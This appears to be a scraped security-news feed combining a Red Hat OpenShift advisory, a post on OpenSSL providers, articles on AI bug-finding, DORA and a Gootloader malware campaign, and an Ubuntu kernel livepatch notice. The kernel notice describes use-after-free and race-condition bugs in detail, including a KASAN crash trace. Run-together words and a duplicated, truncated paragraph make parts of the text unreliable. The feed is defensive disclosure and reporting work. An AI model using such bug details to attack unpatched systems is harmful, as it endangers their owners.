Red Hat Security Advisory 2024-8697-03 - Red Hat OpenShift Container Platform release 4.14.40 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8697.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.14.40 bug fix and security update  
Advisory ID:        RHSA-2024:8697-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8697  
Issue date:         2024-11-11  
Revision:           03  
CVE Names:          CVE-2023-29401  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.40 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.40. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:8700

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* encoding/gob: golang: Calling Decoder.Decode on a message which contains  
deeply nested structures can cause a panic due to stack exhaustion  
(CVE-2024-34156)  
* golang-github-gin-gonic-gin: Gin Web Framework does not properly sanitize  
filename parameter of Context.FileAttachment function (CVE-2023-29401)  
* net/http: Denial of service due to improper 100-continue handling in  
net/http (CVE-2024-24791)  
* go/parser: golang: Calling any of the Parse functions containing deeply  
nested literals can cause a panic/stack exhaustion (CVE-2024-34155)  
* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag  
line with deeply nested expressions can cause a panic due to stack  
exhaustion (CVE-2024-34158)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-29401

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2216957  
https://bugzilla.redhat.com/show_bug.cgi?id=2295310  
https://bugzilla.redhat.com/show_bug.cgi?id=2310527  
https://bugzilla.redhat.com/show_bug.cgi?id=2310528  
https://bugzilla.redhat.com/show_bug.cgi?id=2310529  
https://issues.redhat.com/browse/OCPBUGS-10337  
https://issues.redhat.com/browse/OCPBUGS-39086  
https://issues.redhat.com/browse/OCPBUGS-42935  
https://issues.redhat.com/browse/OCPBUGS-42952  
https://issues.redhat.com/browse/OCPBUGS-43058  
https://issues.redhat.com/browse/OCPBUGS-43368  
https://issues.redhat.com/browse/OCPBUGS-43484  
https://issues.redhat.com/browse/OCPBUGS-43505  
https://issues.redhat.com/browse/OCPBUGS-43628  
https://issues.redhat.com/browse/OCPBUGS-43688  
https://issues.redhat.com/browse/OCPBUGS-43821  
https://issues.redhat.com/browse/OCPBUGS-43916

Red Hat Security Advisory 2024-8697-03

OpenSSL is a popular cryptographical toolkit with more than 20 years of history. For a long time, the only way to extend it was by using an "engine", which defines how a cryptographic algorithm is computed. This could include hardware devices and even new algorithms not included in the main library, but as OpenSSL evolved it became evident that the engines API was limiting. A new pluggable system, called a "provider", was introduced.What is a providerA provider, in OpenSSL terms, is a unit of code that provides one or more implementations of cryptographic operations, making new algorithms avai

OpenSSL is a popular cryptographical toolkit with more than 20 years of history. For a long time, the only way to extend it was by using an "engine", which defines how a cryptographic algorithm is computed. This could include hardware devices and even new algorithms not included in the main library, but as OpenSSL evolved it became evident that the engines API was limiting. A new pluggable system, called a "provider", was introduced.

**What is a provider**

A provider, in OpenSSL terms, is a unit of code that provides one or more implementations of cryptographic operations, making new algorithms available. It's also a dynamically loaded plugin that can be loaded during OpenSSL initialization, as long as it's specified in the OpenSSL configuration file. It can also be loaded on demand, which is vital when you're using legacy (insecure) algorithms when interacting with a very old system, or when you're experimenting with a very new algorithm.

The provider concept was introduced into OpenSSL during the development of version 3.0. It was inevitable that some new concept would get implemented to reach one of the main goals of the OpenSSL 3.0 design: Maintainable FIPS-140-3 certified modules. The previous approach of implementing numerous runtime checks was hardly sustainable, and FIPS requirements are a moving target, so it was important to implement a more robust model.

The engine API didn't allow separating FIPS and non-FIPS algorithms and implementations in a robust manner, nor did it ensure that the data didn’t cross the FIPS boundary back and forth, breaking FIPS requirements. The provider API was designed from scratch, and the engine API has been deprecated. Deprecated APIs may be removed in future major releases.

**What has changed**

OpenSSL 3.0 was introduced in Red Hat Enterprise Linux (RHEL) 9. It came with three providers covering all the main use cases, including the FIPS module.

In RHEL 9, there were no other mature providers, so we had no valid replacement for the engines that were regularly used in RHEL (the most important one being the PKCS#11 engine). We supported engines for the lack of any other option. However, since then we've worked hard to provide a replacement option for existing engines. In RHEL 10, we have a new PKCS#11 provider. We've also added several more providers.

**Modifying applications with explicit support for engines**

For ABI compatibility reasons, we are unable to compile OpenSSL without engine support. But in the forthcoming RHEL 10, we're removing header file declarations of engine-specific functions. By enforcing the definition of OPENSSL\_NO\_ENGINE, we disable engine support in applications that are properly detecting engine support at build time. We found a low number of applications that use engines in a way that requires significant code changes. However, most applications respect the OPENSSL\_NO\_ENGINE definition and don't require any code changes.

Some applications include the openssl/engine.h header file even when they support the OPENSSL\_NO\_ENGINE definition. In RHEL 10, we're changing the engine.h header to be a dummy, empty file. Some applications have custom mechanisms to detect the presence of engines, but it's often incorrect. Some expect that engines are always available in OpenSSL, but not in OpenSSL forks. All these applications require changes, both upstream and downstream.

We introduced the same change in Fedora. The community did not approve the idea of just removing the engine.h file there, so we moved it to a separate package and defined the OPENSSL\_NO\_ENGINE symbol only when that header is not installed.

**Notable providers in RHEL 10**

RHEL 10 has a new PKCS#11 provider. It fully encompasses the functionality of the old PKCS#11 engine, and allows tuning for some specific tokens. It’s extensively tested by internal and external customers and has no major problems we're aware of.

We have also included a TPM2 provider, another hardware-backed solution. TPM2 is a chip present in most modern computers. It establishes that the boot process starts from a trusted combination of hardware and software, and helps establish a trusted execution environment. The TPM2 provider allows users to operate this chip and use its keys through the OpenSSL API.

Finally, we've added the OQS provider, which brings post-quantum algorithms to OpenSSL. The post-quantum cryptography transition is one of the biggest cryptographic challenges of the RHEL 10 lifetime. This provider allows end users and developers to conduct experiments with post-quantum cryptography until OpenSSL adds native support.

**Conclusion**

A major version change is generally a good time to drop deprecated functionality. We are not aware of any common scenarios previously covered by engines that are not covered by providers. Applications now do not need to care about implementation details. Instead, code can be written in a way that transparently uses a key managed by a provider, as opposed to previous use of engines requiring custom code.

OpenSSL in Red Hat Enterprise Linux 10: From engines to providers

Large language models (LLMs) can help app security firms find and fix software vulnerabilities. Malicious actors are on to them too, but here's why defenders may retain the edge.

Source: vs148 via Shutterstock

Security researchers and attackers are turning to AI models to find vulnerabilities, a technology whose use will likely drive the annual count of software flaws higher, but could eventually result in fewer flaws in public releases, experts say.

On Nov. 1, Google said its Big Sleep large language model (LLM) agent discovered a buffer-underflow vulnerability in the popular database engine, SQLite. The experiment shows both the peril and the promise of AI-powered vulnerability discovery tools: The AI agent searched through the code for variations on a specific vulnerability, but identified the software flaw in time for Google to notify the SQLite project and work with them to fix the issue.

Using AI just for software-defect discovery could result in a surge in vulnerability disclosures, but introducing LLM agents into the development pipeline could reverse the trend and lead to fewer software flaws escaping into the wild, says Tim Willis, head of Google's Project Zero, the company's effort to identify zero-day vulnerabilities.

"While we are at an early stage, we believe that the techniques we develop through this research will become a useful and general part of the toolbox that software developers have at their disposal," he says.

Google is not alone in searching for better ways to find — and fix — vulnerabilities. In August, a group of researchers from Georgia Tech, Samsung Research, and other firms — collectively known as Team Atlanta — used an LLM bug-finding system to automatically find and patch a bug in SQLite. And just last month, cybersecurity firm GreyNoise Intelligence revealed it had used its Sift AI system to analyze honeypot logs leading to the discovery and patching of two zero-day vulnerabilities affecting Internet-connected cameras used in sensitive environments.

Overall, companies are gaining more ways to automate vulnerability discovery, and — if they are serious about security — will be able to drive down the number of vulnerabilities in their products by using the tools in development, says Corey Bodzin, chief product officer at GreyNoise Intelligence.

"The exciting thing is we do have technology that allows people who \[care about\] security to be more effective," he says. "Sadly ... there are not many companies where that is ... a primary driver, but even in companies where \[security is\] purely viewed as a cost" can benefit from using these tools.

**Only the First Steps**

Currently, Google's custom approach is still bespoke and requires work to adapt to specific vulnerability-finding tasks. The company's Big Sleep agent does not to look for completely new vulnerabilities, but uses details from a previously discovered vulnerability to look for similar issues. The project has looked at smaller programs with known vulnerabilities as test cases, but the SQLite experiment is the first time they found vulnerabilities in production code, the Google Project Zero and Google DeepMind researchers stated in Google's blog post describing the research.

While specialized fuzzers would likely have found the bug, tuning those tools to perform well is a very manual process, says Google's Willis.

"One promise of \[L\]LM agents is that they might generalize across applications without the need for specialized tuning," he says. "Additionally, we're hopeful that \[L\]LM agents will be able to uncover a different subset of vulnerabilities than those typically found through fuzzing."

The use of AI-based vulnerability discovery tools will be a race between attackers and defenders. Manual code review is a viable way of finding bugs for attackers, who only need a single exploitable vulnerability or short chain of vulnerabilities. But defenders need a scalable way of finding and fixing applications, Willis says. While bug-finding tools can be a force multiplier for both attackers and defenders, the ability to scale up to analyze code will likely be a greater benefit for defenders, Willis says.

"We expect that advances in automated vulnerability discovery, triage, and remediation will disproportionately benefit defenders," he says.

**Focus AI on Finding and Fixing Bugs**

Companies that focus on using AI to generate secure code and fix bugs when found will deliver higher quality code from developers, says Chris Wysopal, co-founder and chief security evangelist at Veracode, an application security firm. He argues that automating bug finding and bug fixing are two completely different problems. Finding vulnerabilities is a very large data problem, whIle fixing bugs usually deals with perhaps a dozen lines of code.

"Once you know the bug is there — if you found it through fuzzing, or through an LLM, or using human code review — and you know what kind of bug it is, fixing it is relatively easy," he says. "So, LLMs favor defenders, because having access to source code and fixing issues is easy. So I'm kind of bullish that we can eliminate whole classes of vulnerabilities, but it's not from finding more, it's from being able to fix more."

Companies that require developers to run automated security tools before code check-in will find themselves on a path to paying down their security debt — the collection of issues that they know about, but have not had time to fix, he says. Currently, about half (46%) of organizations have security debt in the form of persistent critical flaws in applications, according to Veracode's 2024 State of Software Security report.

"The idea that you're committing code that has a problem in it, and it's not fixed, will become the exception, not the rule, like it is today," Wysopal says. "Once you can start to automate this fixing — and we're always getting better at automating finding \[vulnerabilities\] — I think that's how things change."

Yet, the technology will still have to overcome companies' focus on efficiency and productivity over security, says Bob Rudis, vice president of data science and security research at GreyNoise Intelligence. He points to the fixing of the two security vulnerabilities that GreyNoise Intelligence found and responsibly disclosed. The company only fixed the issues in two product models, but not others — despite the fact that the other products likely had similar issues, he says.

Google and GreyNoise Intelligence proved that the technology will work, but whether companies integrate AI into the development pipelines to eliminate bugs is still an open question.

Rudis has doubts.

"I'm sure a handful of organizations are going to deploy it — it's going to make like seven C files a little bit safer across a bunch of organizations, and maybe we'll get like a tick more security for the ones that can actually deploy it properly," he says. "But ultimately, until we actually change the incentive structure around how software vendors build and deploy things, and how consumers actually purchase and deploy and configure things, we are not going to see any benefit."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

AI &amp; LLMs Show Promise in Squashing Software Bugs

The European Union's Digital Operational Resilience Act requires financial entities to focus on third-party risk, resilience, and testing.

Source: Sikov via Adobe Stock Photo

COMMENTARY 

January 2025 is a big month for the finance industry – and the clock is ticking. The Digital Operational Resilience Act (DORA) is set to shape how financial entities, such as banks, insurance companies, and investment firms, approach their IT infrastructure and data security. According to Article 3 (1), this regulation will enhance "the ability of a financial entity to build, assure and review its operational integrity and reliability."

Although IT security and digital resilience form a part of the reforms that followed the 2008 financial crisis, they've taken a back seat over the years. DORA aims to address the rising cyber threat.  

Member states across the European Union have until January to comply with this new regulation or risk severe fallout. A breach could result in fines of up to 2% of an organization's total annual worldwide revenue or up to 1% of the company's average daily worldwide revenue.  

Despite the urgent call to action, delays are making it difficult for institutions to prepare. While the scoping and harmonization templates were due to the commission in July, public release is uncertain. There are currently no sets of controls or technical standards, so how are those being impacted meant to prepare? 

But with time running out, financial entities do not have the luxury of watching and waiting. Without any real guidance, it's in their best interest to take matters into their own hands and do what they can with the information they have.

**Size Equals Complexity **

As with many new regulations, one of the key challenges is complexity – and DORA takes that to a whole new level, with six chapters and over 280 articles. It introduces a series of new standards and controls that companies must meet and for which a complete restructure of processes may be required.

Remember, DORA is a regulation, not a framework, so comprehending the many requirements is job No. 1 for organizations. To ensure compliance, organizations need full visibility over all company assets. This allows organizations to continuously monitor all systems and identify and address any potential gaps in security. 

**You Can't Protect What You Can't See **

Technology is a borderless entity; DORA calls for complete visibility, despite the vast array of interconnected devices used by firms. The new regulation focuses heavily on data and providing clear and actionable evidence. DORA places a particular emphasis on third-party risk, resilience, and testing – areas currently without an existing framework and becoming more vulnerable every year. 

PCI security standards, for example, focus solely on protecting credit card information. NIST's Cybersecurity Framework covers certain elements of recovery and fills the gap left by PCI, but it still doesn't cover reporting. DORA, on the other hand, doesn't focus so much on penetration testing but more on threat-based testing, requiring organizations to emulate a threat rather than conduct a vulnerability scan.  

So instead of monitoring for any existing cybersecurity vulnerabilities, the new regulations require organizations to monitor for any potential weaknesses – identifying and rectifying them before they can trigger unnecessary risk. This approach minimizes the risks of vulnerabilities developing and ensures organizations have real-time updates on the state of their security. 

**What Can Business Do at This Stage? **

One thing DORA is very clear on is an emphasis on results and the need to continually monitor for threats. This regulation should not to be taken lightly. Under DORA, authorities have the power to request data and execute powers to assess a company's compliance with these regulations.  

As a first step, organizations should conduct a thorough gap-analysis exercise to identify areas in need of improvement – within their own business as well as across their supply chains. Ahead of January, organizations must ensure that their risk management strategies are up to date. Right or wrong, DORA assumes firms have a sufficient risk management framework in place. The same is expected of parties in the supply chain, although how far down the chain is yet to be determined.  

All parties involved need to obtain and maintain detailed knowledge of all critical assets at any given time. Tools that continuously monitor all assets provide real-time critical information on processes across the company. Only through continuous monitoring can organizations understand where the gaps in their security are and ensure they are properly addressed. 

Regardless of delays, DORA is coming and businesses must be prepared. Organizations that view this incoming regulation as more than just another push for compliance – and instead a platform from which to truly enhance their security posture – will gain that all-important competitive edge. Through continuous monitoring and effective threat management, organizations will achieve a new level of protection across their entire network.  

**About the Author**

CEO, Quod Orbis

Martin Greenfield is the CEO of Continuous Controls Monitoring solutions provider, Quod Orbis. He has over two decades in the cyber security space. With his team, Martin helps deliver complete cyber controls visibility for our clients via a single pane of glass, through Quod Orbis’ Continuous Controls Monitoring (CCM) platform. Their clients can see and understand their security and risk posture in real time, which in turn drives their risk investment decisions at the enterprise level.

Preparing for DORA Amid Technical Controls Ambiguity

A significant amount of vulnerabilities in the Linux kernel have been resolved that include use-after-free and race conditions.

    Linux kernel vulnerabilitiesA security issue affects these releases of Ubuntu and its derivatives:-   Ubuntu 20.04 LTS-   Ubuntu 18.04 LTS-   Ubuntu 16.04 LTS-   Ubuntu 22.04 LTS-   Ubuntu 14.04 LTSSummarySeveral security issues were fixed in the kernel.Software Description-   linux - Linux kernel-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems-   linux-azure - Linux kernel for Microsoft Azure Cloud systems-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems-   linux-gke - Linux kernel for Google Container Engine (GKE) systems-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems-   linux-ibm - Linux kernel for IBM cloud systems-   linux-oracle - Linux kernel for Oracle Cloud systemsDetailsIn the Linux kernel, the following vulnerability has been resolved:inet: inet_defrag: prevent sk release while still in use ip_local_out()and other functions can pass skb->sk as function argument. If the skb isa fragment and reassembly happens before such function call returns, thesk must not be released. This affects skb fragments reassembled vianetfilter or similar modules, e.g. openvswitch or ct_act.c, when run aspart of tx pipeline. Eric Dumazet made an initial analysis of this bug.Quoting Eric: Calling ip_defrag() in output path is also implyingskb_orphan(), which is buggy because output path relies on sk notdisappearing. A relevant old patch about the issue was : 8282f27449bf(“inet: frag: Always orphan skbs inside ip_defrag()”) [..net/ipv4/ip_output.c depends on skb->sk being set, and probably to aninet socket, not an arbitrary one. If we orphan the packet in ipvlan,then downstream things like FQ packet scheduler will not work properly.We need to change ip_defrag() to only use skb_orphan() when reallyneeded, ie whenever frag_list is going to be used. Eric suggested tostash sk in fragment queue and made an initial patch. However there is aproblem with this: If skb is refragmented again right after,ip_do_fragment() will copy head->sk to the new fragments, and sets updestructor to sock_wfree. IOW, we have no choice but to fix up sk_wmemaccouting to reflect the fully reassembled skb, else wmem willunderflow. This change moves the orphan down into the core, to lastpossible moment. As ip_defrag_offset is aliased with sk_buff->sk member,we must move the offset into the FRAG_CB, else skb->sk gets clobbered.This allows to delay the orphaning long enough to learn if the skb hasto be queued or if the skb is completing the reasm queue. In the formercase, things work as before, skb is orphaned. This is safe because skbgets queued/stolen and won’t continue past reasm engine. In the lattercase, we will steal the skb->sk reference, reattach it to the head skb,and fix up wmem accouting when inet_frag inflates truesize.(CVE-2024-26921)In the Linux kernel, the following vulnerability has been resolved:af_unix: Fix garbage collector racing against connect() Garbagecollector does not take into account the risk of embryo getting enqueuedduring the garbage collection. If such embryo has a peer that carriesSCM_RIGHTS, two consecutive passes of scan_children() may see adifferent set of children. Leading to an incorrectly elevated inflightcount, and then a dangling pointer within the gc_inflight_list. socketsare AF_UNIX/SOCK_STREAM S is an unconnected socket L is a listeningin-flight socket bound to addr, not in fdtable V’s fd will be passed viasendmsg(), gets inflight count bumped connect(S, addr) sendmsg(S, [V]);close(V) __unix_gc() —————- ————————- ———– NS = unix_create1() skb1 =sock_wmalloc(NS) L = unix_find_other(addr) unix_state_lock(L)unix_peer(S) = NS // V count=1 inflight=0 NS = unix_peer(S) skb2 =sock_alloc() skb_queue_tail(NS, skb2[V]) // V became in-flight // Vcount=2 inflight=1 close(V) // V count=1 inflight=1 // GC candidatecondition met for u in gc_inflight_list: if (total_refs ==inflight_refs) add u to gc_candidates // gc_candidates={L, V} for u ingc_candidates: scan_children(u, dec_inflight) // embryo (skb1) was not// reachable from L yet, so V’s // inflight remains unchanged__skb_queue_tail(L, skb1) unix_state_unlock(L) for u in gc_candidates:if (u.inflight) scan_children(u, inc_inflight_move_tail) // V count=1inflight=2 (!) If there is a GC-candidate listening socket, lock/unlockits state. This makes GC wait until the end of any ongoing connect() tothat socket. After flipping the lock, a possibly SCM-laden embryo isalready enqueued. And if there is another embryo coming, it can notpossibly carry SCM_RIGHTS. At this point, unix_inflight() can not happenbecause unix_gc_lock is already taken. Inflight graph remainsunaffected. (CVE-2024-26923)In the Linux kernel, the following vulnerability has been resolved: mm:swap: fix race between free_swap_and_cache() and swapoff() There waspreviously a theoretical window where swapoff() could run and teardown aswap_info_struct while a call to free_swap_and_cache() was running inanother thread. This could cause, amongst other bad possibilities,swap_page_trans_huge_swapped() (called by free_swap_and_cache()) toaccess the freed memory for swap_map. This is a theoretical problem andI haven’t been able to provoke it from a test case. But there has beenagreement based on code review that this is possible (see link below).Fix it by using get_swap_device()/put_swap_device(), which will stallswapoff(). There was an extra check in _swap_info_get() to confirm thatthe swap entry was not free. This isn’t present in get_swap_device()because it doesn’t make sense in general due to the race between gettingthe reference and swapoff. So I’ve added an equivalent check directly infree_swap_and_cache(). Details of how to provoke one possible issue(thanks to David Hildenbrand for deriving this): –8<—–__swap_entry_free() might be the last user and result in “count ==SWAP_HAS_CACHE”. swapoff->try_to_unuse() will stop as soon as soon assi->inuse_pages==0. So the question is: could someone reclaim the folioand turn si->inuse_pages==0, before we completedswap_page_trans_huge_swapped(). Imagine the following: 2 MiB folio inthe swapcache. Only 2 subpages are still references by swap entries.Process 1 still references subpage 0 via swap entry. Process 2 stillreferences subpage 1 via swap entry. Process 1 quits. Callsfree_swap_and_cache(). -> count == SWAP_HAS_CACHE [then, preempted inthe hypervisor etc.] Process 2 quits. Calls free_swap_and_cache(). ->count == SWAP_HAS_CACHE Process 2 goes ahead, passesswap_page_trans_huge_swapped(), and calls __try_to_reclaim_swap().__try_to_reclaim_swap()->folio_free_swap()->delete_from_swap_cache()->put_swap_folio()->free_swap_slot()->swapcache_free_entries()->swap_entry_free()->swap_range_free()-> … WRITE_ONCE(si->inuse_pages,si->inuse_pages - nr_entries); What stops swapoff to succeed afterprocess 2 reclaimed the swap cache but before process1 finished its callto swap_page_trans_huge_swapped()? –8<—– (CVE-2024-26960)In the Linux kernel, the following vulnerability has been resolved:Bluetooth: Fix use-after-free bugs caused by sco_sock_timeout When thesco connection is established and then, the sco socket is releasing,timeout_work will be scheduled to judge whether the sco disconnection istimeout. The sock will be deallocated later, but it is dereferencedagain in sco_sock_timeout. As a result, the use-after-free bugs willhappen. The root cause is shown below: Cleanup Thread | Worker Threadsco_sock_release | sco_sock_close | __sco_sock_close |sco_sock_set_timer | schedule_delayed_work | sco_sock_kill | (wait atime) sock_put(sk) //FREE | sco_sock_timeout | sock_hold(sk) //USE TheKASAN report triggered by POC is shown below: [ 95.890016================================================================== [95.890496] BUG: KASAN: slab-use-after-free insco_sock_timeout+0x5e/0x1c0 [ 95.890755] Write of size 4 at addrffff88800c388080 by task kworker/0:0/7 … [ 95.890755] Workqueue: eventssco_sock_timeout [ 95.890755] Call Trace: [ 95.890755][ 95.890755] dump_stack_lvl+0x45/0x110 [ 95.890755]print_address_description+0x78/0x390 [ 95.890755print_report+0x11b/0x250 [ 95.890755] ? __virt_addr_valid+0xbe/0xf0 [95.890755] ? sco_sock_timeout+0x5e/0x1c0 [ 95.890755kasan_report+0x139/0x170 [ 95.890755] ? update_load_avg+0xe5/0x9f0 [95.890755] ? sco_sock_timeout+0x5e/0x1c0 [ 95.890755kasan_check_range+0x2c3/0x2e0 [ 95.890755] sco_sock_timeout+0x5e/0x1c0 [95.890755] process_one_work+0x561/0xc50 [ 95.890755worker_thread+0xab2/0x13c0 [ 95.890755] ? pr_cont_work+0x490/0x490 [95.890755] kthread+0x279/0x300 [ 95.890755] ? pr_cont_work+0x490/0x490 [95.890755] ? kthread_blkcg+0xa0/0xa0 [ 95.890755]ret_from_fork+0x34/0x60 [ 95.890755] ? kthread_blkcg+0xa0/0xa0 [95.890755 ret_from_fork_asm+0x11/0x20 [ 95.890755][ 95.890755] [ 95.890755 Allocated by task 506: [ 95.890755]kasan_save_track+0x3f/0x70 [ 95.890755 __kasan_kmalloc+0x86/0x90 [95.890755] __kmalloc+0x17f/0x360 [ 95.890755 sk_prot_alloc+0xe1/0x1a0 [95.890755] sk_alloc+0x31/0x4e0 [ 95.890755 bt_sock_alloc+0x2b/0x2a0 [95.890755] sco_sock_create+0xad/0x320 [ 95.890755]bt_sock_create+0x145/0x320 [ 95.890755 __sock_create+0x2e1/0x650 [95.890755] __sys_socket+0xd0/0x280 [ 95.890755__x64_sys_socket+0x75/0x80 [ 95.890755] do_syscall_64+0xc4/0x1b0 [95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f [ 95.890755] [95.890755] Freed by task 506: [ 95.890755] kasan_save_track+0x3f/0x70 [95.890755] kasan_save_free_info+0x40/0x50 [ 95.890755poison_slab_object+0x118/0x180 [ 95.890755] __kasan_slab_free+0x12/0x30[ 95.890755] kfree+0xb2/0x240 [ 95.890755] __sk_destruct+0x317/0x410 [95.890755] sco_sock_release+0x232/0x280 [ 95.890755]sock_close+0xb2/0x210 [ 95.890755] __fput+0x37f/0x770 [ 95.890755]task_work_run+0x1ae/0x210 [ 95.890755] get_signal+0xe17/0xf70 [95.890755 arch_do_signal_or_restart+0x3f/0x520 [ 95.890755syscall_exit_to_user_mode+0x55/0x120 [ 95.890755]do_syscall_64+0xd1/0x1b0 [ 95.890755]entry_SYSCALL_64_after_hwframe+0x67/0x6f [ 95.890755] [ 95.890755] Thebuggy address belongs to the object at ffff88800c388000 [ 95.890755]which belongs to the cache kmalloc-1k of size 1024 [ 95.890755 The buggyaddress is located 128 bytes inside of [ 95.890755] freed 1024-byteregion [ffff88800c388000, ffff88800c388400) [ 95.890755] [ 95.890755]The buggy address belongs to the physical page: [ 95.890755 page:refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff88800c38a800pfn:0xc388 [ 95.890755] head: order:3 entire_mapcount:0nr_pages_mapped:0 pincount:0 [ 95.890755] ano —truncated—(CVE-2024-27398)In the Linux kernel, the following vulnerability has been resolved:watchdog: cpu5wdt.c: Fix use-after-free bug caused by cpu5wdt_triggerWhen the cpu5wdt module is removing, the origin code uses del_timer() tode-activate the timer. If the timer handler is running, del_timer()could not stop it and will return directly. If the port region isreleased by release_region() and then the timer handlercpu5wdt_trigger() calls outb() to write into the region that isreleased, the use-after-free bug will happen. Change del_timer() totimer_shutdown_sync() in order that the timer handler could be finishedbefore the port region is released. (CVE-2024-38630)Update instructionsThe problem can be corrected by updating your kernel livepatch to thefollowing versions:Ubuntu 20.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    gke - 107.1    gkeop - 107.1    gkeop - 107.2    ibm - 107.1    ibm - 107.2    lowlatency - 107.1    lowlatency - 107.2    oracle - 107.1    oracle - 107.2Ubuntu 18.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    lowlatency - 107.1    lowlatency - 107.2    oracle - 107.1    oracle - 107.2Ubuntu 16.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    lowlatency - 107.1    lowlatency - 107.2Ubuntu 22.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    gke - 107.1    gke - 107.2    ibm - 107.1    ibm - 107.2    oracle - 107.1Ubuntu 14.04 LTS    generic - 107.1    lowlatency - 107.1Support InformationLivepatches for supported LTS kernels will receive upgrades for a periodof up to 13 months after the build date of the kernel.Livepatches for supported HWE kernels which are not based on an LTSkernel version will receive upgrades for a period of up to 9 monthsafter the build date of the kernel, or until the end of support for thatkernel’s non-LTS distro release version, whichever is sooner.References-   CVE-2024-26921-   CVE-2024-26923-   CVE-2024-26960-   CVE-2024-27398-   CVE-2024-38630

Kernel Live Patch Security Notice LSN-0107-1

It's unclear what the threat actors have against this particular breed of cat, but it's taking down the kitty's enthusiasts with SEO-poisoned links and malware payloads.

Source: Juniors Bildarchiv GmbH via Alamy Stock Photo

New research is showing that criminal cyber actors are seemingly targeting Australians who have a penchant for Bengal cats, a breed of hybrid feline created from crossing of an Asian leopard with domestic breeds.

Armed with Gootloader, a popular malware strain often used as an infostealer or as a malware dropped prior to ransomware attacks, Sophos found that the threat actors are targeting users who search "Are Bengal cats legal in Australia?" and other similar questions.

The researchers found, in one example, that one website returned the following after this kind of search query: a search engine optimization (SEO)-poisoned forum containing hyperlinked texts leading the user to download a .zip file if clicked on. SEO poisoning is what the Gootloader gang is particularly known for, duping victims into clicking on malicious links disguised as legitimate resources.

And this is just the first stage of the malware's payload. 

Following a download, the user is redirected to a different website containing a large JavaScript file. This leads to multiple processes being run on the user's device, allowing threat actors to pass commands and establish persistence to deploy Gootkit — the second stage of the payload— and the malware then acts as a precursor to other tools, such as ransomware or Cobalt Strike.

The detection of the Gootloader variant used in the attacks led to a threat-hunting campaign by Sophos X-Ops MDR, with its researchers reporting that they've "seen continued growth in this approach to initial compromise, with several massive campaigns using this technique over the past year."

And while there are protection blocks that users can implement to detect for this kind of malware, it's best that they adhere to best practices and be wary of suspicious links or sources that may seem questionable. 

**About the Author**

Gootloader Cyberattackers Target Bengal-Cat Aficionados in Oz

WordPress Meetup plugin versions 0.1 and below suffer from an authentication bypass vulnerability.

